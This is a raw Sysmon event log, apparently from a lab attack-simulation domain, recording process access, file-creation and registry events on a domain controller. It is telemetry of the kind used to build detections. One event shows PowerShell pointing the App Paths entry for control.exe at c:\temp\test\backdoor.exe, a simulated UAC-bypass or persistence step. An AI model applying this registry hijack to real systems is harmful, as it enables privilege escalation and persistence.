PowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e572b.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.243{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.211{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.211{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.190{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.175{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.158{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.143{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.128{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.128{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.111{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001051259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.043{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001051258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.012{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.004{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnk2021-07-12 07:48:31.902 23542300x80000000000000001051297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:47.361{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=09DBC3D6DF798F0B413319C617DDD35E,SHA256=096337D513E868AAC55E5500624C1F86663E084A92608152048F60A56E23AFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:47.246{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F317F83F7B4F0631706FEF31879C8A,SHA256=F87F48032AA0C96AB4EF054F4F3149EAA4EA7393989C602C94D10E07824DEEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:47.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0B31247925FFD364496BF59FC179E0,SHA256=1C4973C75D47E91A817FA4703B4D1C0F03926510F5AF7884E78C206177545F45,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.590{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51102-false10.0.1.12-8000- 13241300x80000000000000001051294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:57:47.114{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\test\backdoor.exe 23542300x80000000000000001051298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:48.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AE7DF88BDC9BAEC32D4D6D5DB4D777,SHA256=9F9D3828DDD7ED7C5D24CC9B1CCF28D1FC363B9359C0C3E3182EE202245515C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:48.149{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=361D2A727F546D610D9682A80192D8D8,SHA256=85B9BE556C760DEAB1265E75B3DFBA499AAE8F2A5B8546320F7EDFA77771368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.944{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\WimProvider.dllMD5=1B0C7DFB2240BA004B37904073624DB3,SHA256=F2C7DB522DDE968EDF49B03BC10978AAC4C42C745CA4A474627E8CEBBCEBB00A,IMPHASH=20D31D66F56B810094B1AA564C92009Dtruetrue 23542300x80000000000000001051443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\VhdProvider.dllMD5=F37C8F5BF852151D9BF085687A8DEC6D,SHA256=6CDFC95C2F2ED3695D5EE8CF4367A6C7FB5707DA3C234CEE8FA8C1BBDE426DE7,IMPHASH=3CA997A1A0BD38B850B18DAED5E948DEtruetrue 23542300x80000000000000001051442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\UnattendProvider.dllMD5=3DB4777B76FC1973A61754FAEC348981,SHA256=29A4C7379E5A0A7532C90B5ACE0DD99AB5311D03CC0BA6A4BCFB410D7D8B01AE,IMPHASH=4FA75E8720452554D61C8AC5FD64C43Ftruetrue 23542300x80000000000000001051441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.928{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\TransmogProvider.dllMD5=5E82E2B7CFF045C7CDA8E33EAB186402,SHA256=0038B82E999C3DEF3980D39A8CAED9EA6B52A4FC9EF58BF3B3F5FC91F7748112,IMPHASH=7746C0E3C7D3763C5F13C90D4934087Btruetrue 23542300x80000000000000001051440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\SmiProvider.dllMD5=C5C7A9E3121B91E51ECFBA6FB2985044,SHA256=FB519B9EEF4C3344D58C768BD3AD7ADCB0677EA7B998056B6A13620CB9E61412,IMPHASH=03C38376DA7CCE75E82EECACADA0EA03truetrue 23542300x80000000000000001051439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ProvProvider.dllMD5=5077063311C5708318C5FA3E255011ED,SHA256=97FA95102B6ACF00C70F140EE9FA4A73A6BE7C03E0F0D99AE58DB5E492CD0ECA,IMPHASH=D8DD764BFC0F1D9E403714D169018B83truetrue 23542300x80000000000000001051438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OSProvider.dllMD5=4868187A2F176074DB7F35E356F74D4F,SHA256=84C8C4C67C808871A278254304D985533F67D44391840F43674FC829014E1B60,IMPHASH=82A4D833A82D441391A9AA3027199337truetrue 23542300x80000000000000001051437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.912{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\OfflineSetupProvider.dllMD5=86B7E8438B1125C479FD275B1BDDB9A7,SHA256=47FAF8671B25A30D7BCC47AD35926D70DB633A181FA6C276479B4408A526E63E,IMPHASH=B8B4A188EFC4F12D33591C6D319B6F12truetrue 23542300x80000000000000001051436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.908{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\MsiProvider.dllMD5=EA19239A85416A488360FA564D312402,SHA256=F21591336CD1A24EE941827620405FA34414C1C349216B4B8083ECD1FFF17C29,IMPHASH=33E1132923056DDEFB0521726DA5B987truetrue 23542300x80000000000000001051435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\LogProvider.dllMD5=F7DB4F104DBB56DF5A156E7329E80112,SHA256=7C67EFAF44D1413576B4575B1A4C975BCB10B64BEF13E6756E895D4DB9E61AA2,IMPHASH=FB695172E8A76C56E97CE435F8ED0220truetrue 23542300x80000000000000001051434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IntlProvider.dllMD5=0082903881275179642AE83EFA720310,SHA256=7CCF1625E6FBE4DB16F12AC037E4236A3EF269DEE47A157C68374C867941F9E8,IMPHASH=CFB81BC5FF922F23D605A653700FE666truetrue 23542300x80000000000000001051433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\ImagingProvider.dllMD5=EEB4AA36BAD26A2C6216A1FF3439B58C,SHA256=44A6679425039DC870C297294C4B3323F6FA9DE5C7D16D7D0AB7E1254AFC75D3,IMPHASH=0264D9B4BFE54732ADF0E29BC73BF280truetrue 23542300x80000000000000001051432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 